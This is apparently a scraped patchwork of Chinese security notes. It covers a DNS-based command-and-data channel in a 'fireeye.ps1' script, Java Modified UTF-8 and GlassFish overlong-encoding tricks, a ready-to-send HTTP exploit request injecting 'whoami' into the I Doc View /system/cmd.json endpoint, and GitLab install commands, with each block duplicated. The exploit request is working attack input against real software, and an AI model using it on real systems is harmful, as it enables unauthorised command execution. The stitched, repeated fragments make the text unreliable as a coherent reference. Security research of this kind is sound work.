fireeye.ps1是一个巧妙利用DNS请求来接收命令和传输数据的脚本。总体行为如下:
获取用于标识身份的ID
通过获取DNS解析的IP地址 ,每次接收4个字节,写入批处理文件中
执行批处理文件,输出结果到TXT文件
发送TXT到服务器
清理痕迹
获取用于标识身份的ID
通过获取DNS解析的IP地址 ,每次接收4个字节,写入批处理文件中
执行批处理文件,输出结果到TXT文件
发送TXT到服务器
清理痕迹
Java在反序列化时使用ObjectInputStream类,这个类实现了DataInput接口,这个接口定义了读取字符串的方法readUTF。在解码中,Java实际实现的是一个魔改过的UTF-8编码,名为“Modified UTF-8”
其原理就是GlassFish在路径解码时使用UTF-8编码,很典型的Overlong Encoding利用
其原理就是GlassFish在路径解码时使用UTF-8编码,很典型的Overlong Encoding利用
I Doc View在线文档预览系统 命令执行漏洞
POST /system/cmd.json HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: 127.0.0.1
Content-Length: 31
Expect: 100-continue
Connection: close
cmd=echo+%26+%28whoami%29+%26
POST /system/cmd.json HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: 127.0.0.1
Content-Length: 31
Expect: 100-continue
Connection: close
cmd=echo+%26+%28whoami%29+%26
sudo yum install -y curl policycoreutils-python openssh-server perl
# 如果没有成功,可以重启一下虚拟机再去安装
sudo systemctl enable sshd
sudo systemctl start sshd
curl -fsSL https://packages.gitlab.cn/repository/raw/scripts/setup.sh | /bin/bash
sudo EXTERNAL_URL="http://192.168.48.131" yum install -y gitlab-jh
# 192.168.48.131这个地址是安装者本人的虚拟机地址
# 如果没有成功,可以重启一下虚拟机再去安装
sudo systemctl enable sshd
sudo systemctl start sshd
curl -fsSL https://packages.gitlab.cn/repository/raw/scripts/setup.sh | /bin/bash
sudo EXTERNAL_URL="http://192.168.48.131" yum install -y gitlab-jh
# 192.168.48.131这个地址是安装者本人的虚拟机地址
❤1